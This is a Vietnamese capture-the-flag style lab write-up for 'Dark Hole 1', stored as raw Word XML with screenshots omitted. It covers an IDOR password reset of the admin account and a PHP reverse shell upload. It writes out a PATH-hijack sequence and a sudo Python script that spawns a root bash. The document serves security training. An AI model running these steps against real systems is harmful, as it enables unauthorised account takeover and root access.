                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C383578" w14:textId="1368433E" w:rsidR="00E752CA" w:rsidRDefault="00E752CA" w:rsidP="005F613A"/>
    <w:p w14:paraId="21E864BC" w14:textId="2D4588E4" w:rsidR="00E752CA" w:rsidRDefault="000763E4" w:rsidP="000763E4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab: Dark Hole 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA14C12" w14:textId="6C5C0BCC" w:rsidR="00402961" w:rsidRDefault="00402961" w:rsidP="00402961">
      <w:r>
        <w:t>Ip máy này là: 192.168.56.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D8CE5" w14:textId="45B2CF53" w:rsidR="00402961" w:rsidRDefault="00402961" w:rsidP="00402961">
      <w:r w:rsidRPr="00402961">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="477D514A" wp14:editId="7C182791">
            <wp:extent cx="5731510" cy="169799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697990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8817C" w14:textId="5EA6A4D9" w:rsidR="00402961" w:rsidRDefault="00402961" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00402961">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078F62E" w14:textId="21BD7117" w:rsidR="00402961" w:rsidRDefault="00DB71A8" w:rsidP="00402961">
      <w:r w:rsidRPr="00DB71A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4838CFDF" wp14:editId="647CC5CF">
            <wp:extent cx="5731510" cy="253873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538730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA83F7E" w14:textId="52DEAD65" w:rsidR="00DB71A8" w:rsidRDefault="00DB71A8" w:rsidP="00402961">
      <w:r>
        <w:t>Có vẻ tiếp tục lại là 1 máy chủ web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AEF00E" w14:textId="6374659B" w:rsidR="00362219" w:rsidRDefault="00362219" w:rsidP="00402961">
      <w:r w:rsidRPr="00362219">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49CA0BCB" wp14:editId="338DD6C0">
            <wp:extent cx="5731510" cy="2933065"/>
            <wp:effectExtent l="0" t="0" r="254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933065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48AFB8" w14:textId="71C0DC4F" w:rsidR="00BA5B78" w:rsidRDefault="0059456A" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve">Sử dụng Burp Suite </w:t>
      </w:r>
      <w:r w:rsidR="00E0050E">
        <w:t xml:space="preserve">quét thử nhưng không có gì đáng chú ý, </w:t>
      </w:r>
      <w:r w:rsidR="00BA5B78">
        <w:t>ngoại trừ có một file database.php không đọc được và một folder /upload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0A861" w14:textId="30585E1D" w:rsidR="00BA5B78" w:rsidRDefault="00C476D5" w:rsidP="00402961">
      <w:r w:rsidRPr="00C476D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2226B3EA" wp14:editId="76E6C810">
            <wp:extent cx="5731510" cy="244665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446655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F5394" w14:textId="51DCE934" w:rsidR="00C7345A" w:rsidRDefault="00C7345A" w:rsidP="00402961">
      <w:r w:rsidRPr="00C7345A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22EB5E1D" wp14:editId="3A86396E">
            <wp:extent cx="5494496" cy="284250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94496" cy="2842506"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="036ACDB2" w14:textId="51101ADF" w:rsidR="00362219" w:rsidRDefault="00C7345A" w:rsidP="00402961">
      <w:r>
        <w:t>Đầu tiên t</w:t>
      </w:r>
      <w:r w:rsidR="00E0050E">
        <w:t>a sẽ tạo thử 1 user và đăng nhập vào:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A6314" w14:textId="68D8D1C8" w:rsidR="00E0050E" w:rsidRDefault="00E0050E" w:rsidP="00402961">
      <w:r w:rsidRPr="00E0050E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35B36047" wp14:editId="463E8DF5">
            <wp:extent cx="5731510" cy="2047875"/>
            <wp:effectExtent l="0" t="0" r="254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047875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F4E76E" w14:textId="401AAD5D" w:rsidR="00E0050E" w:rsidRDefault="00E0050E" w:rsidP="00402961">
      <w:r>
        <w:t>Có 1 chức năng đổi mật khẩu</w:t>
      </w:r>
      <w:r w:rsidR="00CD7191">
        <w:t>, thử bắt request từ việc đổi mật khẩu xem sao:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A799C07" w14:textId="3C80B24A" w:rsidR="00CD7191" w:rsidRDefault="00CD7191" w:rsidP="00402961">
      <w:r w:rsidRPr="00CD7191">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="634125DD" wp14:editId="5D6D130D">
            <wp:extent cx="5731510" cy="337312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373120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA9DAC" w14:textId="1C9AD7D5" w:rsidR="00E46565" w:rsidRDefault="00CD7191" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve">Có 2 tham số là password và id được truyền vào, liệu có thể thay đổi giá trị của </w:t>
      </w:r>
      <w:r w:rsidR="00E46565">
        <w:t>các tham số này ? Hãy thử với id, thường các user admin sẽ có id từ 1. Có thể thay đổi mật khẩu user admin hoặc administrator chăng</w:t>
      </w:r>
      <w:r w:rsidR="00D10C19">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56C5D7" w14:textId="1D3DAC41" w:rsidR="00D10C19" w:rsidRDefault="00D10C19" w:rsidP="00402961">
      <w:r w:rsidRPr="00D10C19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F4B9ED" wp14:editId="3BA0A744">
            <wp:extent cx="5731510" cy="36766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76650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205F734" w14:textId="7764B0C4" w:rsidR="00D10C19" w:rsidRDefault="00D10C19" w:rsidP="00402961">
      <w:r>
        <w:t>Response trả về với id 200, nghĩa là ta có quyền sửa đổi mật khẩu người khác, thử đăng nhập bằng user admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE59F8" w14:textId="2F7C5D26" w:rsidR="00D10C19" w:rsidRDefault="00BA5B78" w:rsidP="00402961">
      <w:r w:rsidRPr="00BA5B78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A4577B7" wp14:editId="589A38A8">
            <wp:extent cx="5731510" cy="171958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719580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E45A8" w14:textId="4AEC96DF" w:rsidR="00BA5B78" w:rsidRDefault="00C7345A" w:rsidP="00402961">
      <w:r>
        <w:t>Để ý rằng trong thư mục /upload có 1 ảnh, có lẽ chúng ta có thể upload các ảnh</w:t>
      </w:r>
      <w:r w:rsidR="00BA5B78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7164B91B" w14:textId="3B13F7A5" w:rsidR="003250E6" w:rsidRDefault="003250E6" w:rsidP="00402961">
      <w:r w:rsidRPr="003250E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234BD153" wp14:editId="24285A11">
            <wp:extent cx="5731510" cy="28092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809240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08105AFF" w14:textId="104BA638" w:rsidR="003250E6" w:rsidRDefault="003250E6" w:rsidP="00402961">
      <w:r>
        <w:t>Hãy thử thêm một số định dạng nữa xem chúng ta có thể upload những định dạng nào</w:t>
      </w:r>
      <w:r w:rsidR="00A8598A">
        <w:t>, liệu có thể up 1 reverseshell php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41345DBA" w14:textId="1DDD55E8" w:rsidR="00C34F11" w:rsidRDefault="00C34F11" w:rsidP="00402961">
      <w:r w:rsidRPr="00C34F11">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09E76030" wp14:editId="0C61C55E">
            <wp:extent cx="2088061" cy="57917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88061" cy="579170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3565F2" w14:textId="12F022FD" w:rsidR="00C34F11" w:rsidRDefault="0067765F" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve">Với 3 định dạng này, ta có thể biến từ 1 file php thành jpg, png hay gif nhưng đó là với lỗi </w:t>
      </w:r>
      <w:r w:rsidR="00731C98" w:rsidRPr="00731C98">
        <w:t>Phar Deserialization</w:t>
      </w:r>
      <w:r w:rsidR="00731C98">
        <w:t xml:space="preserve"> và cần biết một ít mã nguồn về lỗi này trong ứng dụng web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B05C6" w14:textId="446DC71C" w:rsidR="0033137F" w:rsidRDefault="0033137F" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve">Do máy chủ chạy trên nền ngôn ngữ PHP, mà trong PHP có một loại file là Phar file. </w:t>
      </w:r>
      <w:r w:rsidRPr="0033137F">
        <w:t>Các tệp Phar là các tệp Lưu trữ PHP, có thể được sử dụng để đóng gói mã PHP và các phần phụ thuộc của nó vào một tệp duy nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A094D7" w14:textId="0F4E78DE" w:rsidR="0061530E" w:rsidRDefault="00D96767" w:rsidP="00402961">
      <w:r>
        <w:t>Điều kiện để có thể tải lên đó là máy chủ web cấu hình lỏng lẻo việc quản lý tải lên tệp Phar.</w:t>
      </w:r>
      <w:r w:rsidR="001E59CB">
        <w:t xml:space="preserve"> Vậy ta có thể tạo </w:t>
      </w:r>
      <w:r w:rsidR="0061530E">
        <w:t xml:space="preserve">thử </w:t>
      </w:r>
      <w:r w:rsidR="001E59CB">
        <w:t>một file Phar chứa đoạn mã PHP reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="0061530E">
        <w:t xml:space="preserve"> và tải lên xem sao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507FA780" w14:textId="52C413AE" w:rsidR="0061530E" w:rsidRDefault="00140EE9" w:rsidP="00402961">
      <w:r w:rsidRPr="00140EE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0684C6A2" wp14:editId="2EC4E64E">
            <wp:extent cx="5517358" cy="3063505"/>
            <wp:effectExtent l="0" t="0" r="762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17358" cy="3063505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733CFC7" w14:textId="77674A3A" w:rsidR="00140EE9" w:rsidRDefault="00140EE9" w:rsidP="00402961">
      <w:r>
        <w:t>Có vẻ như mọi thứ đều tốt. Giờ chúng ta sẽ tạo một cổng lắng nghe và trên web mở shell lên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50978855" w14:textId="0B17163F" w:rsidR="0045713D" w:rsidRDefault="0045713D" w:rsidP="00402961">
      <w:r w:rsidRPr="0045713D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FBD2E21" wp14:editId="5554DC8E">
            <wp:extent cx="5731510" cy="147193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471930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C4FBE" w14:textId="40036E40" w:rsidR="00C15533" w:rsidRDefault="00C15533" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B90E12">
        <w:t>Có 2 user trong home là darkhole và john, darkhole không có gì đáng chú ý, nhưng trong john có một ứng dụng chúng ta có thể thực thi được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C77BD36" w14:textId="5EA96417" w:rsidR="00B90E12" w:rsidRDefault="00B90E12" w:rsidP="00402961">
      <w:r w:rsidRPr="00B90E12">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADEED50" wp14:editId="554310DE">
            <wp:extent cx="4740051" cy="3985605"/>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40051" cy="3985605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371B434" w14:textId="5F76D782" w:rsidR="00B90E12" w:rsidRDefault="00B90E12" w:rsidP="00402961">
      <w:r>
        <w:t xml:space="preserve">Ứng dụng này </w:t>
      </w:r>
      <w:r w:rsidR="00D37658">
        <w:t xml:space="preserve">giống như lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00D37658" w:rsidRPr="00D37658">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00F62C24">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F62C24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00802AD9">
        <w:t>khi kiểm tra id, nhận thấy ta chỉ có quyền đọc và thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3685A4" w14:textId="22360FBD" w:rsidR="00802AD9" w:rsidRDefault="00802AD9" w:rsidP="00402961">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DCAD94A" wp14:editId="59836E94">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>62345</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>782147</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4100946" cy="159327"/>
                <wp:effectExtent l="0" t="0" r="13970" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="89" name="Rectangle 89"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4100946" cy="15932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7DB7B" id="Rectangle 89" o:spid="_x0000_s1026" style="position:absolute;margin-left:4.9pt;margin-top:61.6pt;width:322.9pt;height:1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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00802AD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="681D87BD" wp14:editId="4FED522C">
            <wp:extent cx="5418290" cy="1767993"/>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18290" cy="1767993"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0695B0" w14:textId="2CC06257" w:rsidR="00802AD9" w:rsidRDefault="003C2949" w:rsidP="00402961">
      <w:r>
        <w:t>Nếu như đã không thể sử dụng id này, ta có thể tạo một id khác với</w:t>
      </w:r>
      <w:r w:rsidR="00964D03">
        <w:t xml:space="preserve"> khả năng cấp </w:t>
      </w:r>
      <w:r w:rsidR="00421720">
        <w:t>shell cho chúng ta</w:t>
      </w:r>
      <w:r w:rsidR="00651D9D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FBC34" w14:textId="2AC3DF76" w:rsidR="0034546A" w:rsidRPr="0034546A" w:rsidRDefault="0034546A" w:rsidP="0034546A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034546A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cd /tmp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C87CBD" w14:textId="3760790D" w:rsidR="0034546A" w:rsidRPr="0034546A" w:rsidRDefault="0034546A" w:rsidP="0034546A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034546A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo “/bin/bash” &gt; id </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E585B" w14:textId="0B10B0A2" w:rsidR="0034546A" w:rsidRPr="0034546A" w:rsidRDefault="0034546A" w:rsidP="0034546A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034546A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> chmod +x id </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47598428" w14:textId="1A54E037" w:rsidR="0034546A" w:rsidRPr="0034546A" w:rsidRDefault="0034546A" w:rsidP="0034546A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034546A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> export PATH=/tmp:$PATH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A89E2" w14:textId="116CE0DA" w:rsidR="0034546A" w:rsidRDefault="0034546A" w:rsidP="0034546A">
      <w:r w:rsidRPr="0034546A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651D9D" w:rsidRPr="00651D9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FFA27B6" wp14:editId="1AD250A7">
            <wp:extent cx="2133785" cy="548688"/>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33785" cy="548688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FAB7EE" w14:textId="1AEC0736" w:rsidR="00651D9D" w:rsidRDefault="00651D9D" w:rsidP="0034546A">
      <w:r>
        <w:t>Tiếp theo hãy thử thực thi lại xem chúng ta có thể chuyển sang user john hay chưa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDD647A" w14:textId="3B65BA61" w:rsidR="00AA765A" w:rsidRDefault="00AA765A" w:rsidP="0034546A">
      <w:r w:rsidRPr="00AA765A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F12AE3" wp14:editId="5907325C">
            <wp:extent cx="3170195" cy="2377646"/>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70195" cy="2377646"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABEB30" w14:textId="5615D1A7" w:rsidR="00387A40" w:rsidRDefault="00387A40" w:rsidP="0034546A">
      <w:r>
        <w:t>Sau khi đã vào được user john, trong folder .ssh có private key để đăng nhập vào user này thông qua ssh</w:t>
      </w:r>
      <w:r w:rsidR="00964103">
        <w:t xml:space="preserve"> với passowrd được đề cập trong file password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E18C8CA" w14:textId="722FA45E" w:rsidR="00964103" w:rsidRDefault="00964103" w:rsidP="0034546A">
      <w:r w:rsidRPr="00964103">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C1A8DB" wp14:editId="28779308">
            <wp:extent cx="1699407" cy="548688"/>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99407" cy="548688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C7B39" w14:textId="1BB3EDA2" w:rsidR="00387A40" w:rsidRDefault="000D5CF1" w:rsidP="0034546A">
      <w:r>
        <w:t>Sau khi đăng nhập vào user john, kiểm tra xem quyền sudo có bị cấu hình sai không:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B01F8A" w14:textId="710879E9" w:rsidR="000D5CF1" w:rsidRDefault="000D5CF1" w:rsidP="0034546A">
      <w:r w:rsidRPr="000D5CF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C5A04B" wp14:editId="627D03D2">
            <wp:extent cx="5731510" cy="72390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723900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39CBB0" w14:textId="783DF0FF" w:rsidR="000D5CF1" w:rsidRDefault="000D5CF1" w:rsidP="0034546A">
      <w:r>
        <w:t>Với file.py, ta có thể</w:t>
      </w:r>
      <w:r w:rsidR="00DC770E">
        <w:t xml:space="preserve"> chỉnh sửa để</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tạo tập lệnh lấy shell bash và lên root dễ dàng</w:t>
      </w:r>
      <w:r w:rsidR="00DC770E">
        <w:t xml:space="preserve"> với 2 dòng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53530E" w14:textId="5104C360" w:rsidR="00DC770E" w:rsidRPr="00DC770E" w:rsidRDefault="00DC770E" w:rsidP="00DC770E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC770E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import os;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C43E8B" w14:textId="3EC811D7" w:rsidR="00DC770E" w:rsidRPr="00DC770E" w:rsidRDefault="00DC770E" w:rsidP="00DC770E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC770E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>os.system("/bin/bash")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1527F961" w14:textId="77777777" w:rsidR="00DC770E" w:rsidRDefault="00DC770E" w:rsidP="00DC770E"/>
    <w:p w14:paraId="1C614863" w14:textId="321F35BC" w:rsidR="00DC770E" w:rsidRDefault="00DC770E" w:rsidP="00DC770E">
      <w:r>
        <w:t>Sau đó thực thi tập lệnh file.py với quyền sudo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D493B" w14:textId="11593876" w:rsidR="00DC770E" w:rsidRDefault="00031367" w:rsidP="00DC770E">
      <w:r w:rsidRPr="00031367">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C84741B" wp14:editId="00672DEB">
            <wp:extent cx="4587638" cy="1821338"/>
            <wp:effectExtent l="0" t="0" r="381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87638" cy="1821338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7C12A" w14:textId="119A94F9" w:rsidR="00031367" w:rsidRDefault="00031367" w:rsidP="00DC770E"/>
    <w:p w14:paraId="0E9FA73E" w14:textId="711BE479" w:rsidR="00031367" w:rsidRDefault="00031367" w:rsidP="00031367">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab: Dark</w:t>
      </w:r>
      <w:r w:rsidR="00702533">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hole 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618DF61" w14:textId="706E4CD0" w:rsidR="002C41E3" w:rsidRDefault="002C41E3" w:rsidP="002C41E3">
      <w:r>
        <w:t>Địa chỉ IP của máy là: 192.168.56.145</w:t>
      </w:r>
    </w:p>
